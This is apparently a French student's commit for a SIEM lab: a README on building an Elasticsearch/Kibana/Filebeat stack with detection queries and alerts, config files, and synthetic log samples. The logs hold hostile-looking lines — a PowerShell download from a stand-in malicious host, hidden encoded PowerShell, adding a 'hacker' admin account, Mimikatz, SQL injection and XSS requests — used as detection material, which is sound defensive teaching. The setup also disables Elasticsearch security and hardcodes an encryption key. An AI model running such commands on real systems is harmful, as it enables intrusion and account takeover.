feat: Semaine 12, jour 3
@@ -0,0 +1,235 @@
|
||||
# Lab 02 - Cybersecurity 3
|
||||
Installation Wazuh
|
||||
|
||||
## 1. Mise en place
|
||||
|
||||
Le `docker-compose.yml` a été modifié pour répondre aux dernières exigences ElasticSearch, incluant version, arguments et commandes d'amorçage.
|
||||
|
||||
`filebeat.yml` a également été modifié pour la version 9.4.4.
|
||||
|
||||
## 2. Démarrage de la stack
|
||||
|
||||

|
||||
|
||||
## 3. Ingestion des logs
|
||||
|
||||
Les fichiers sont bien placés dans le dossier local `./data` et montés en *Read-Only* dans le conteneur `filebeat`. Une rapide inspection dans le conteneur permet de retrouver les documents :
|
||||
|
||||
```bash
|
||||
> docker exec -it filebeat bash
|
||||
|
||||
[root@189c7e30152f filebeat]# ls
|
||||
LICENSE.txt README.md fields.yml filebeat.reference.yml kibana module
|
||||
NOTICE.txt data filebeat filebeat.yml logs modules.d
|
||||
|
||||
[root@189c7e30152f filebeat]# pwd
|
||||
/usr/share/filebeat
|
||||
|
||||
[root@189c7e30152f filebeat]# ls /var/log
|
||||
btmp hawkey.log lastlog powershell_eventlog.csv private webserver.log wtmp
|
||||
```
|
||||
|
||||
## 4. Requêtes de détection
|
||||
|
||||
On constate que les fichiers `filebeat-*` sont correctement journalisés dans ElasticSearch, avec du détail sous format JSON :
|
||||
|
||||

|
||||
|
||||
```json
|
||||
{
|
||||
"@timestamp": [
|
||||
"2026-08-05T08:24:24.471Z"
|
||||
],
|
||||
"agent.ephemeral_id": [
|
||||
"60ae4b96-7c76-4a10-b96a-aa2926124ac2"
|
||||
],
|
||||
"agent.hostname": [
|
||||
"189c7e30152f"
|
||||
],
|
||||
"agent.id": [
|
||||
"2b9a5d07-efbf-406e-88ba-21a632984a62"
|
||||
],
|
||||
"agent.name": [
|
||||
"189c7e30152f"
|
||||
],
|
||||
"agent.type": [
|
||||
"filebeat"
|
||||
],
|
||||
"agent.version": [
|
||||
"9.4.4"
|
||||
],
|
||||
"ecs.version": [
|
||||
"8.0.0"
|
||||
],
|
||||
"fields.type": [
|
||||
"powershell"
|
||||
],
|
||||
"host.name": [
|
||||
"189c7e30152f"
|
||||
],
|
||||
"input.type": [
|
||||
"filestream"
|
||||
],
|
||||
"log.file.device_id": [
|
||||
"74"
|
||||
],
|
||||
"log.file.fingerprint": [
|
||||
"0552875f2772591c83e87ce749d75a90e9aa8aae5cc637f79755d3154df4ac37"
|
||||
],
|
||||
"log.file.inode": [
|
||||
"12103423998720744"
|
||||
],
|
||||
"log.file.path": [
|
||||
"/var/log/powershell_eventlog.csv"
|
||||
],
|
||||
"log.offset": [
|
||||
1661
|
||||
],
|
||||
"message": [
|
||||
"\"2025-07-29T14:40:10Z\",\"4720\",\"Information\",\"Microsoft-Windows-Security-Auditing\",\"Un nouveau compte utilisateur a été créé : NomUtilisateur=hacker, Groupe=Administrateurs\""
|
||||
],
|
||||
"_id": "ZOMG0Z8BjDC_E0hYQKKW",
|
||||
"_index": ".ds-filebeat-9.4.4-2026.08.05-000001",
|
||||
"_score": null
|
||||
}
|
||||
```
|
||||
|
||||
Je mets à profit mon écran large et je fais un tri par champs pour avoir un détail pertinent sur les logs :
|
||||
|
||||

|
||||
|
||||
A cette occasion, je corrige les requêtes pour refléter les nouvelles normes utilisées sur ElasticSearch / OpenSearch, et un référent que j'utilise qui est Datadog :
|
||||
|
||||
```sql
|
||||
-- type:"web" AND (url:* OR query:*) AND message:"UNION SELECT"
|
||||
fields.type:web AND message:("UNION SELECT" OR "union select" OR "'1'='1")
|
||||
|
||||
-- type:"powershell" AND (message:*"New-Object Net.WebClient"* OR message:*"Invoke-Expression"*)
|
||||
fields.type:powershell AND message:("New-Object Net.WebClient" OR "Invoke-*")
|
||||
|
||||
-- type:"web" AND status:401
|
||||
fields.type:web AND message:(" 401 ")
|
||||
```
|
||||
|
||||
## 6. Création du Dashboard
|
||||
|
||||
### Créer des métriques
|
||||
|
||||
Le seul champ reconnaissable par les logs est "message", qui contient les informations. En revanche, ElasticSearch ne gère "pas" nativement le CONTENU des messages en les compartimentant. Il faut pouvoir extraire ces données. La solution la plus efficace est de passer une instruction dans Filebeat, mais dans un vrai environnement de remontée de logs, on n'a que rarement accès à l'agent émetteur. Aussi va-t-on essayer de faire des métriques dans Kibana directement.
|
||||
|
||||
Pour ça, je vais dans `Dev Tools > Console` et je fais, aidé de Kimi K2.7, un "Ingest Pipeline Conditionnel" :
|
||||
|
||||
```json
|
||||
PUT _ingest/pipeline/multi_log_parser
|
||||
{
|
||||
"description": "Détecte et sépare les logs Web et PowerShell/Windows",
|
||||
"processors": [
|
||||
{
|
||||
"dissect": {
|
||||
"description": "Parse les logs Web au format Apache/Nginx",
|
||||
"if": "ctx.message != null && ctx.message.contains('HTTP/')",
|
||||
"field": "message",
|
||||
"pattern": "%{web_client_ip} - - [%{web_timestamp}] \"%{web_http_method} %{web_request_path} HTTP/%{web_http_version}\" %{web_status_code} %{web_bytes} \"%{web_referrer}\" \"%{web_user_agent}\""
|
||||
}
|
||||
},
|
||||
{
|
||||
"csv": {
|
||||
"description": "Parse les logs Windows/PowerShell au format CSV",
|
||||
"if": "ctx.message != null && (ctx.message.contains('Microsoft-Windows') || ctx.message.startsWith('\"202'))",
|
||||
"field": "message",
|
||||
"target_fields": [
|
||||
"pws_timestamp",
|
||||
"pws_event_id",
|
||||
"pws_level",
|
||||
"pws_provider",
|
||||
"pws_message"
|
||||
]
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||

|
||||
|
||||
Pas de succès. Je tente alors avec `Stack Management > Data Views > Logs` de faire des champs personnalisés :
|
||||
|
||||
```js
|
||||
if (params._source.message != null) {
|
||||
def msg = params._source.message;
|
||||
if (msg instanceof List && !msg.isEmpty()) { msg = msg[0]; }
|
||||
|
||||
// Exécute uniquement si le message ressemble au log Windows
|
||||
if (msg instanceof String && msg.contains('Microsoft-Windows')) {
|
||||
String[] parts = msg.splitOnToken('","');
|
||||
if (parts.length > 1) {
|
||||
emit(parts[1].replace('"', '').trim()); // Extrait l'ID d'évènement
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
```js
|
||||
if (params._source.message != null) {
|
||||
def msg = params._source.message;
|
||||
if (msg instanceof List && !msg.isEmpty()) { msg = msg[0]; }
|
||||
|
||||
// Exécute uniquement si le message contient une requête HTTP
|
||||
if (msg instanceof String && msg.contains('HTTP/')) {
|
||||
String[] parts = msg.splitOnToken(' ');
|
||||
if (parts.length >= 9) {
|
||||
emit(parts[8].trim()); // Extrait le code de réponse (200, 401, 403...)
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
J'ai des résultats :
|
||||
|
||||

|
||||
|
||||

|
||||
|
||||
Je peux maintenant faire un VRAI tableau avec mes métriques :
|
||||
|
||||

|
||||
|
||||
Et enfin faire une visualisation :
|
||||
|
||||

|
||||
|
||||
Hélas le jeu de données est
|
||||
|
||||
## 7. Alertes automatisées
|
||||
|
||||
Pour l'alerte demandée, je vais dans `Stack Management > Alerts and Insights > Rules` bien que ça ne soit pas très instinctif, mais pour les besoins du cours, il faudra y opérer.
|
||||
|
||||
### Interruption
|
||||
|
||||

|
||||
|
||||
Je dois rajouter un élément au `kibana.yml` du conteneur :
|
||||
|
||||
```yml
|
||||
xpack.encryptedSavedObjects.encryptionKey: "ma_cle_secrete_super_longue_de_32_caracteres!"
|
||||
```
|
||||
|
||||
J'édite aussi le `docker-compose.yml` pour déploiement automatique.
|
||||
|
||||
Je définis les conditions de déclenchement (ici, très parano, faute de gros jeux de données) :
|
||||
|
||||

|
||||
|
||||
Pour les actions, je suis obligé d'activer la licence d'essai 30 jours (ça va, on a le temps) mais je n'ai que deux actions de disponibles, là om il y a normalement des dizaines de choix.
|
||||
|
||||
**POUR LES BESOINS DE L'EXERCICE** je ne peux pas générer de WorkFlow complet. En revanche je peux montrer un exemple défini sur Datadog, utilisant un Webhook paramétré dans Slack pour prévenir les utilisateurs d'une instance EC2 qui tourne à vide :
|
||||
|
||||

|
||||
|
||||
J'ai déjà fait du déploiement :
|
||||
|
||||
- Courriel
|
||||
- JIRA OpsGenie
|
||||
- Webhook Slack
|
||||
- Webhook Discord
|
||||
- Application WhatsApp pour les urgences VIP
|
||||
@@ -0,0 +1,6 @@
|
||||
Date,Time,SourceIP,Username,Status
|
||||
2025-07-29,13:58:01,192.168.1.100,admin,Failed
|
||||
2025-07-29,13:58:05,192.168.1.100,admin,Failed
|
||||
2025-07-29,13:58:09,192.168.1.100,root,Failed
|
||||
2025-07-29,13:58:12,192.168.1.100,root,Failed
|
||||
2025-07-29,13:58:15,192.168.1.100,root,Success
|
||||
|
@@ -0,0 +1,4 @@
|
||||
PID,ProcessName,CommandLine,ParentPID
|
||||
2345,svchost.exe,C:\Windows\System32\svchost.exe -k netsvcs,520
|
||||
3378,powershell.exe,powershell -nop -w hidden -enc SQB...=,2345
|
||||
3981,evil.exe,C:\Users\Public\evil.exe,3378
|
||||
|
@@ -0,0 +1,4 @@
|
||||
Date,Time,EventID,Message
|
||||
2025-07-29,14:05:11,4104,Script PowerShell suspect exécuté : Invoke-Mimikatz
|
||||
2025-07-29,14:07:25,4103,Commande PowerShell encodée détectée
|
||||
2025-07-29,14:09:43,4688,Nouveau processus : powershell.exe -nop -w hidden
|
||||
|
@@ -0,0 +1,10 @@
|
||||
192.168.1.10 - - [29/Jul/2025:14:10:22 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
|
||||
192.168.1.15 - - [29/Jul/2025:14:11:05 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
|
||||
192.168.1.20 - - [29/Jul/2025:14:12:44 +0000] "GET /admin HTTP/1.1" 403 721 "-" "Mozilla/5.0 (Linux; x86_64)"
|
||||
192.168.1.25 - - [29/Jul/2025:14:13:55 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
|
||||
192.168.1.30 - - [29/Jul/2025:14:14:37 +0000] "GET /wp-login.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
|
||||
192.168.1.35 - - [29/Jul/2025:14:15:19 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 1589 "-" "sqlmap/1.4.12#stable"
|
||||
192.168.1.40 - - [29/Jul/2025:14:16:45 +0000] "GET /etc/passwd HTTP/1.1" 400 231 "-" "Mozilla/5.0 (Linux; x86_64)"
|
||||
192.168.1.45 - - [29/Jul/2025:14:17:33 +0000] "GET /search.php?q=<script>alert(1)</script> HTTP/1.1" 200 854 "-" "Mozilla/5.0 (X11; Linux x86_64)"
|
||||
192.168.1.50 - - [29/Jul/2025:14:18:07 +0000] "GET /backup.tar.gz HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
|
||||
192.168.1.60 - - [29/Jul/2025:14:19:40 +0000] "GET /index.php?id=1' OR '1'='1 HTTP/1.1" 200 512 "-" "sqlmap/1.4.12#stable"
|
||||
@@ -0,0 +1,11 @@
|
||||
"TimeCreated","Id","LevelDisplayName","ProviderName","Message"
|
||||
"2025-07-29T14:23:51Z","4624","Information","Microsoft-Windows-Security-Auditing","Un compte a été connecté avec succès. Sujet : NomUtilisateur=ADMIN, IP=192.168.1.45, Type de connexion=3"
|
||||
"2025-07-29T14:25:12Z","4625","Warning","Microsoft-Windows-Security-Auditing","Échec de tentative de connexion. Sujet : NomUtilisateur=TestUser, IP=192.168.1.100, Mot de passe incorrect"
|
||||
"2025-07-29T14:27:33Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : powershell.exe, Commande : powershell -ExecutionPolicy Bypass -File script.ps1"
|
||||
"2025-07-29T14:29:55Z","4689","Information","Microsoft-Windows-Security-Auditing","Un processus a été terminé. Nom du processus : powershell.exe, PID=4356"
|
||||
"2025-07-29T14:31:12Z","4104","Information","Microsoft-Windows-PowerShell","Script PowerShell exécuté : Invoke-WebRequest http://malicious-site.test/download.exe"
|
||||
"2025-07-29T14:32:45Z","4100","Warning","Microsoft-Windows-PowerShell","Échec d'exécution du script en raison de la stratégie d'exécution"
|
||||
"2025-07-29T14:34:20Z","7045","Information","Service Control Manager","Un nouveau service a été installé. Nom=SuspiciousService, Binaire=C:\\Temp\\suspect.exe"
|
||||
"2025-07-29T14:36:05Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : cmd.exe, Commande : cmd /c net user hacker /add"
|
||||
"2025-07-29T14:38:22Z","4624","Information","Microsoft-Windows-Security-Auditing","Connexion réussie depuis une session RDP, NomUtilisateur=Administrator, IP=10.0.0.15"
|
||||
"2025-07-29T14:40:10Z","4720","Information","Microsoft-Windows-Security-Auditing","Un nouveau compte utilisateur a été créé : NomUtilisateur=hacker, Groupe=Administrateurs"
|
||||
|
@@ -0,0 +1,10 @@
|
||||
192.168.1.10 - - [29/Jul/2025:14:10:22 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
|
||||
192.168.1.15 - - [29/Jul/2025:14:11:05 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
|
||||
192.168.1.20 - - [29/Jul/2025:14:12:44 +0000] "GET /admin HTTP/1.1" 403 721 "-" "Mozilla/5.0 (Linux; x86_64)"
|
||||
192.168.1.25 - - [29/Jul/2025:14:13:55 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
|
||||
192.168.1.30 - - [29/Jul/2025:14:14:37 +0000] "GET /wp-login.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
|
||||
192.168.1.35 - - [29/Jul/2025:14:15:19 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 1589 "-" "sqlmap/1.4.12#stable"
|
||||
192.168.1.40 - - [29/Jul/2025:14:16:45 +0000] "GET /etc/passwd HTTP/1.1" 400 231 "-" "Mozilla/5.0 (Linux; x86_64)"
|
||||
192.168.1.45 - - [29/Jul/2025:14:17:33 +0000] "GET /search.php?q=<script>alert(1)</script> HTTP/1.1" 200 854 "-" "Mozilla/5.0 (X11; Linux x86_64)"
|
||||
192.168.1.50 - - [29/Jul/2025:14:18:07 +0000] "GET /backup.tar.gz HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
|
||||
192.168.1.60 - - [29/Jul/2025:14:19:40 +0000] "GET /index.php?id=1' OR '1'='1 HTTP/1.1" 200 512 "-" "sqlmap/1.4.12#stable"
|
||||
@@ -0,0 +1,11 @@
|
||||
"TimeCreated","Id","LevelDisplayName","ProviderName","Message"
|
||||
"2025-07-29T14:23:51Z","4624","Information","Microsoft-Windows-Security-Auditing","Un compte a été connecté avec succès. Sujet : NomUtilisateur=ADMIN, IP=192.168.1.45, Type de connexion=3"
|
||||
"2025-07-29T14:25:12Z","4625","Warning","Microsoft-Windows-Security-Auditing","Échec de tentative de connexion. Sujet : NomUtilisateur=TestUser, IP=192.168.1.100, Mot de passe incorrect"
|
||||
"2025-07-29T14:27:33Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : powershell.exe, Commande : powershell -ExecutionPolicy Bypass -File script.ps1"
|
||||
"2025-07-29T14:29:55Z","4689","Information","Microsoft-Windows-Security-Auditing","Un processus a été terminé. Nom du processus : powershell.exe, PID=4356"
|
||||
"2025-07-29T14:31:12Z","4104","Information","Microsoft-Windows-PowerShell","Script PowerShell exécuté : Invoke-WebRequest http://malicious-site.test/download.exe"
|
||||
"2025-07-29T14:32:45Z","4100","Warning","Microsoft-Windows-PowerShell","Échec d'exécution du script en raison de la stratégie d'exécution"
|
||||
"2025-07-29T14:34:20Z","7045","Information","Service Control Manager","Un nouveau service a été installé. Nom=SuspiciousService, Binaire=C:\\Temp\\suspect.exe"
|
||||
"2025-07-29T14:36:05Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : cmd.exe, Commande : cmd /c net user hacker /add"
|
||||
"2025-07-29T14:38:22Z","4624","Information","Microsoft-Windows-Security-Auditing","Connexion réussie depuis une session RDP, NomUtilisateur=Administrator, IP=10.0.0.15"
|
||||
"2025-07-29T14:40:10Z","4720","Information","Microsoft-Windows-Security-Auditing","Un nouveau compte utilisateur a été créé : NomUtilisateur=hacker, Groupe=Administrateurs"
|
||||
|
@@ -0,0 +1,10 @@
|
||||
192.168.1.10 - - [29/Jul/2025:14:10:22 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
|
||||
192.168.1.15 - - [29/Jul/2025:14:11:05 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
|
||||
192.168.1.20 - - [29/Jul/2025:14:12:44 +0000] "GET /admin HTTP/1.1" 403 721 "-" "Mozilla/5.0 (Linux; x86_64)"
|
||||
192.168.1.25 - - [29/Jul/2025:14:13:55 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
|
||||
192.168.1.30 - - [29/Jul/2025:14:14:37 +0000] "GET /wp-login.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
|
||||
192.168.1.35 - - [29/Jul/2025:14:15:19 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 1589 "-" "sqlmap/1.4.12#stable"
|
||||
192.168.1.40 - - [29/Jul/2025:14:16:45 +0000] "GET /etc/passwd HTTP/1.1" 400 231 "-" "Mozilla/5.0 (Linux; x86_64)"
|
||||
192.168.1.45 - - [29/Jul/2025:14:17:33 +0000] "GET /search.php?q=<script>alert(1)</script> HTTP/1.1" 200 854 "-" "Mozilla/5.0 (X11; Linux x86_64)"
|
||||
192.168.1.50 - - [29/Jul/2025:14:18:07 +0000] "GET /backup.tar.gz HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
|
||||
192.168.1.60 - - [29/Jul/2025:14:19:40 +0000] "GET /index.php?id=1' OR '1'='1 HTTP/1.1" 200 512 "-" "sqlmap/1.4.12#stable"
|
||||
@@ -0,0 +1,41 @@
|
||||
services:
|
||||
elasticsearch:
|
||||
image: docker.elastic.co/elasticsearch/elasticsearch:9.4.4
|
||||
container_name: elasticsearch
|
||||
environment:
|
||||
- discovery.type=single-node
|
||||
- xpack.security.enabled=false
|
||||
- "ES_JAVA_OPTS=-Xms1g -Xmx1g"
|
||||
ports:
|
||||
- "9200:9200"
|
||||
healthcheck:
|
||||
test: ["CMD-SHELL", "curl -fsS http://localhost:9200/_cluster/health >/dev/null || exit 1"]
|
||||
interval: 30s
|
||||
timeout: 10s
|
||||
retries: 20
|
||||
start_period: 30s
|
||||
|
||||
kibana:
|
||||
image: docker.elastic.co/kibana/kibana:9.4.4
|
||||
container_name: kibana
|
||||
ports:
|
||||
- "5601:5601"
|
||||
depends_on:
|
||||
elasticsearch:
|
||||
condition: service_healthy
|
||||
environment:
|
||||
- ELASTICSEARCH_HOSTS=http://elasticsearch:9200
|
||||
- xpack.encryptedSavedObjects.encryptionKey=ma_cle_secrete_super_longue_de_32_caracteres!
|
||||
|
||||
filebeat:
|
||||
image: docker.elastic.co/beats/filebeat:9.4.4
|
||||
container_name: filebeat
|
||||
command: ["filebeat", "-e", "--strict.perms=false"]
|
||||
user: root
|
||||
volumes:
|
||||
- ./data/webserver.log:/var/log/webserver.log:ro
|
||||
- ./data/powershell_eventlog.csv:/var/log/powershell_eventlog.csv:ro
|
||||
- ./filebeat.yml:/usr/share/filebeat/filebeat.yml:ro
|
||||
depends_on:
|
||||
elasticsearch:
|
||||
condition: service_healthy
|
||||
@@ -0,0 +1,19 @@
|
||||
filebeat.inputs:
|
||||
- type: filestream
|
||||
id: web-logs
|
||||
enabled: true
|
||||
paths:
|
||||
- /var/log/webserver.log
|
||||
fields:
|
||||
type: web
|
||||
|
||||
- type: filestream
|
||||
id: powershell-logs
|
||||
enabled: true
|
||||
paths:
|
||||
- /var/log/powershell_eventlog.csv
|
||||
fields:
|
||||
type: powershell
|
||||
|
||||
output.elasticsearch:
|
||||
hosts: ["http://elasticsearch:9200"]
|
||||
|
After Width: | Height: | Size: 375 KiB |
|
After Width: | Height: | Size: 108 KiB |
|
After Width: | Height: | Size: 326 KiB |
|
After Width: | Height: | Size: 228 KiB |
|
After Width: | Height: | Size: 216 KiB |
|
After Width: | Height: | Size: 104 KiB |
|
After Width: | Height: | Size: 222 KiB |
|
After Width: | Height: | Size: 151 KiB |
|
After Width: | Height: | Size: 24 KiB |
|
After Width: | Height: | Size: 120 KiB |
|
After Width: | Height: | Size: 56 KiB |